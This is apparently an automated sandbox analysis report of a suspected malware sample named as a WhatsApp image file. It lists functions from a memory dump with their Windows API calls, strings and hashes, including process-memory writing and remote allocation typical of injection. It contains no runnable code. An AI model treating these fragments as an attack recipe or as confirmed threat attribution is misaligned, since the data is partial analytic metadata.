SelectObject.GDI32(?,00000000), ref: 0009B033

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 7e9fbd1ed7bd13943a247a69b7a96db6db9d60a2b0ed8d3567f4a20b57c0a0cb
Instruction ID: 3d046bf7c7d1673344963281cfea9a3a5c78c3ef06b68763a72e75d3cd649d3b
Opcode Fuzzy Hash: 7e9fbd1ed7bd13943a247a69b7a96db6db9d60a2b0ed8d3567f4a20b57c0a0cb
Instruction Fuzzy Hash: E02190B4900309BFDB209F95ED487AA7BA8B712365F15422AF524924B0D3F088C1EB90

Function 000A217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 000A21A9
CreateThread.KERNEL32(?,?,000A22DF,00000000,?,?), ref: 000A21ED
GetLastError.KERNEL32 ref: 000A21F7
_free.LIBCMT ref: 000A2200
__dosmaperr.LIBCMT ref: 000A220B

Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: c060fac9acc539f4d5070322234d35221bfee5c35fb8c88f2a13823f9aa49251
Instruction ID: 69cc50b1a34448f0b0b19423ce35555faf808d1fd498ba3e1139c8dc8460360e
Opcode Fuzzy Hash: c060fac9acc539f4d5070322234d35221bfee5c35fb8c88f2a13823f9aa49251
Instruction Fuzzy Hash: 7111C832104306AFDB21AFE9EC41EDB3BE8EF57770B104539F91886152DB71D85187A1

Function 000BABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 000BABD7
GetLastError.KERNEL32(?,000BA69F,?,?,?), ref: 000BABE1
GetProcessHeap.KERNEL32(00000008,?,?,000BA69F,?,?,?), ref: 000BABF0
HeapAlloc.KERNEL32(00000000,?,000BA69F,?,?,?), ref: 000BABF7
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 000BAC0E

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: ab1a6dac491a19c405aa8c3fdcb48567b8dee7d12fba4626a1b950b9699495a0
Instruction ID: d407afcc348d0dfa7d4839293c8661420fb4b7b7e7cc9f7c2e802a4bdb01cf00
Opcode Fuzzy Hash: ab1a6dac491a19c405aa8c3fdcb48567b8dee7d12fba4626a1b950b9699495a0
Instruction Fuzzy Hash: 510119B1300204BFDB104FA9EC48DAB7FADEF8A7557100429F985D3260DAB19C80CB61

Function 000C7A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 000C7A74
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 000C7A82
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 000C7A8A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 000C7A94
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 000C7AD0

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: f813bf8036300f43eb62fc996779f1426ac8e769984405879bec02abf02cb800
Instruction ID: f94b6a234581f625f367fdf31de9db733f3069f0f0b9e562248c6aea6b09b722
Opcode Fuzzy Hash: f813bf8036300f43eb62fc996779f1426ac8e769984405879bec02abf02cb800
Instruction Fuzzy Hash: 93014835C0862DEBCF10AFE5EC48AEDBBB8FF5C711F010459E546B2650DB7096908BA2

Function 000B9ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 000B9ADC
ProgIDFromCLSID.OLE32(?,00000000), ref: 000B9AF7
lstrcmpiW.KERNEL32(?,00000000), ref: 000B9B05
CoTaskMemFree.OLE32(00000000,?,00000000), ref: 000B9B15
CLSIDFromString.OLE32(?,?), ref: 000B9B21

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 0abd108eb740c5d893ef0328e9f3914bcf4768a17994c8f69a8f25263ce92116
Instruction ID: cf4e003774068ee033ccb6a30a09288a4ee0a89b3df102b4c067379385dbc67c
Opcode Fuzzy Hash: 0abd108eb740c5d893ef0328e9f3914bcf4768a17994c8f69a8f25263ce92116
Instruction Fuzzy Hash: 06018F7A600218BFDB104FA4ED44FAA7AEDEF44351F148025FA45E2210D7B1DD809BA0

Function 000BAA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000BAA79
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000BAA83
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000BAA92
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000BAA99
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000BAAAF

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 633f69a713138ac24689a8eee41dea64459d9ff45558744a159695834d6f7847
Instruction ID: 5abdb35fb7d52ad309ab589e5c2627359af7c46f7aabc7ac3dee33259afd898b
Opcode Fuzzy Hash: 633f69a713138ac24689a8eee41dea64459d9ff45558744a159695834d6f7847
Instruction Fuzzy Hash: CCF04975200204AFEB115FE4AC89EAB3BACFF4A754F400429F985C71A0DBB09C81CA72

Function 000BAAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 000BAADA
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 000BAAE4
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000BAAF3
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 000BAAFA
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000BAB10

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 5c920d4a6637c06492794796ce6affb8f46ed24bed6fdf8ec98a0e2b356b3aa0
Instruction ID: c38dd7f0add9b8af911548fd7435d1f233217239efdb91b11b0b5b5c021a6308
Opcode Fuzzy Hash: 5c920d4a6637c06492794796ce6affb8f46ed24bed6fdf8ec98a0e2b356b3aa0
Instruction Fuzzy Hash: 6FF04F753102086FEB110FA4FC98EA73BADFF4A754F000029F995D7190CBB098818A61

Function 000BEC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 000BEC94
GetWindowTextW.USER32(00000000,?,00000100), ref: 000BECAB
MessageBeep.USER32(00000000), ref: 000BECC3
KillTimer.USER32(?,0000040A), ref: 000BECDF
EndDialog.USER32(?,00000001), ref: 000BECF9

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 9ac60ac60a9422154dfeb440b07ea9338bd573e29b8c97430f8903619ce949c1
Instruction ID: 9009edc2cd48af79748b0f7c5a97146b695e3b121795d7db53bb939e7b06ee36
Opcode Fuzzy Hash: 9ac60ac60a9422154dfeb440b07ea9338bd573e29b8c97430f8903619ce949c1
Instruction Fuzzy Hash: 26018130500744ABEB345B50EE4EBD67BB8FB00705F000559B586A18E1DBF0AA89CB80

Function 0009B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 0009B0BA
StrokeAndFillPath.GDI32(?,?,000FE680,00000000,?,?,?), ref: 0009B0D6
SelectObject.GDI32(?,00000000), ref: 0009B0E9
DeleteObject.GDI32 ref: 0009B0FC
StrokePath.GDI32(?), ref: 0009B117

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: f1a23ddd8965c3ada54bef970ccee73f419cc3ddd3840a2328a5de5b508c5c34
Instruction ID: 4f97a66bae298bd08982022702d3359cb4403b0d415159fb8d62c5410535d0bc
Opcode Fuzzy Hash: f1a23ddd8965c3ada54bef970ccee73f419cc3ddd3840a2328a5de5b508c5c34
Instruction Fuzzy Hash: BDF0F638004308AFCB219FA9FD087583BA4A702372F488314F569448F0C7B089D6DF50

Function 000CF23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 000CF2DA
CoCreateInstance.OLE32(0010DA7C,00000000,00000001,0010D8EC,?), ref: 000CF2F2
CoUninitialize.OLE32 ref: 000CF555

Strings

.lnk, xrefs: 000CF28B, 000CF290, 000CF29E

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: 051740765fd3a2da06e1d8b4b317bd5bdf354fda587cd18d39b693d8b1bcde25
Instruction ID: d65a5a0db2935344d8d074e3fdd9f221d0bf6ec5246e7ebe2111bdb86580af2c
Opcode Fuzzy Hash: 051740765fd3a2da06e1d8b4b317bd5bdf354fda587cd18d39b693d8b1bcde25
Instruction Fuzzy Hash: A3A10BB1104201AFD700EF64C891EAFB7E8FF98714F04491DF59597192EB70EA49CB62

Function 000CE7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 0008660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000853B1,?,?,000861FF,?,00000000,00000001,00000000), ref: 0008662F

CoInitialize.OLE32(00000000), ref: 000CE85D
CoCreateInstance.OLE32(0010DA7C,00000000,00000001,0010D8EC,?), ref: 000CE876
CoUninitialize.OLE32 ref: 000CE893

Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF

Strings

.lnk, xrefs: 000CE83B, 000CE84D

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 491e523dca6e909d90a1457cac0776ead416b548d24e94fa2422f84a1477408d
Instruction ID: e34ff072dc4dec0aca087f58c78e32650424abfbad951244aebee71d58cf2c02
Opcode Fuzzy Hash: 491e523dca6e909d90a1457cac0776ead416b548d24e94fa2422f84a1477408d
Instruction Fuzzy Hash: 17A12275604241AFCB10EF14C884E6EBBE5FF88310F148959F99A9B3A2CB31ED45CB91

Function 000A325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 000A32ED

Part of subcall function 000AE0D0: __87except.LIBCMT ref: 000AE10B

Strings

pow, xrefs: 000A32C5, 000A32E2

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 111f79a411bc8ee3a66684c1c5630015560dc63751f0d17d01155d340b64f05c
Instruction ID: aaba059a758c1ce8a53bcda6e1c72ca263f7e7e1fae983a67ce1daa5b2795009
Opcode Fuzzy Hash: 111f79a411bc8ee3a66684c1c5630015560dc63751f0d17d01155d340b64f05c
Instruction Fuzzy Hash: 87513732A0C24196CB6577D8C9417BE7BD4DB43760F308D68F4C5862AAEF388ED49B42

Function 000C4606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0011DC50,?,0000000F,0000000C,00000016,0011DC50,?), ref: 000C4645

Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF

CharUpperBuffW.USER32(?,?,00000000,?), ref: 000C46C5

Strings

THIS, xrefs: 000C4703
REMOVE, xrefs: 000C4676

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf
String ID: REMOVE$THIS
API String ID: 3797816924-776492005
Opcode ID: 12cc79bfc1a09e89995feece8e3ff5a2f841b17fe26f563594afc63979269b06
Instruction ID: fb0ed7e7e06337f6e0494677f65f99dc5c213be0bc83a919782deaab321f56b2
Opcode Fuzzy Hash: 12cc79bfc1a09e89995feece8e3ff5a2f841b17fe26f563594afc63979269b06
Instruction Fuzzy Hash: D0416674A042199FCF01EFA4C891EAEB7F5BF49304F148069E956AB2A2DB30AD45CB50

Function 000BC189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000C430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000BBC08,?,?,00000034,00000800,?,00000034), ref: 000C4335

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 000BC1D3

Part of subcall function 000C42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000BBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 000C4300

Part of subcall function 000C422F: GetWindowThreadProcessId.USER32(?,?), ref: 000C425A
Part of subcall function 000C422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,000BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 000C426A
Part of subcall function 000C422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,000BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 000C4280

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000BC240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000BC28D

Strings

@, xrefs: 000BC2A5

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 20434cb8065095e29bac6f2dd65fd12ad8c265d7ed9629efdb08dee5968cdaf1
Instruction ID: 4b3abcd4ce1379c691fbbf3da1625bc1d7a776ca9e8a8adb1ee94e429f52bc27
Opcode Fuzzy Hash: 20434cb8065095e29bac6f2dd65fd12ad8c265d7ed9629efdb08dee5968cdaf1
Instruction Fuzzy Hash: 5B411B72900218AFDB11DFA4CD92FEEB7B8FB49700F004099FA45B7181DA716E45CB61

Function 000EA63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0011DC00,00000000,?,?,?,?), ref: 000EA6D8
GetWindowLongW.USER32 ref: 000EA6F5
SetWindowLongW.USER32(?,000000F0,00000000), ref: 000EA705

Strings

SysTreeView32, xrefs: 000EA6AA

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 41e933a8f5f0a9bb56679ca5f73b77fc23cc1ca77b39dbfb0abeeacdc15a14ff
Instruction ID: 33fbe54574f6a9720fcef53630042fd7f354f3c61d0b1bf9e4876f93e4d8b892
Opcode Fuzzy Hash: 41e933a8f5f0a9bb56679ca5f73b77fc23cc1ca77b39dbfb0abeeacdc15a14ff
Instruction Fuzzy Hash: 0031BE31204249AFDB218F79DC41BEA7BA9FB4A334F244725F8B5A31E1C770E8509B90

Function 000D5180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000D5190
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 000D51C6

Strings

D, xrefs: 000D522E
|, xrefs: 000D51B5

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CrackInternet_memset
String ID: |$D
API String ID: 1413715105-3794712380
Opcode ID: 11dbb2034b6b4e994734e460859859322d8989251e7d7bdf465e8db99416a5d4
Instruction ID: f8f08f1446bddbedd49826ec5e8e62c292af0bcb5bd3423e06b304378f259a37
Opcode Fuzzy Hash: 11dbb2034b6b4e994734e460859859322d8989251e7d7bdf465e8db99416a5d4
Instruction Fuzzy Hash: 64311971800119ABDF15AFE4CC85EEE7FB9FF19750F100016E815A6266DB31AA46DBA0

Function 000EA0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 000EA15E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 000EA172
SendMessageW.USER32(?,00001002,00000000,?), ref: 000EA196

Strings

SysMonthCal32, xrefs: 000EA129

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 9e89cfa31ecb0436481db46724d154203720805632dacba740dd8989cdd69717
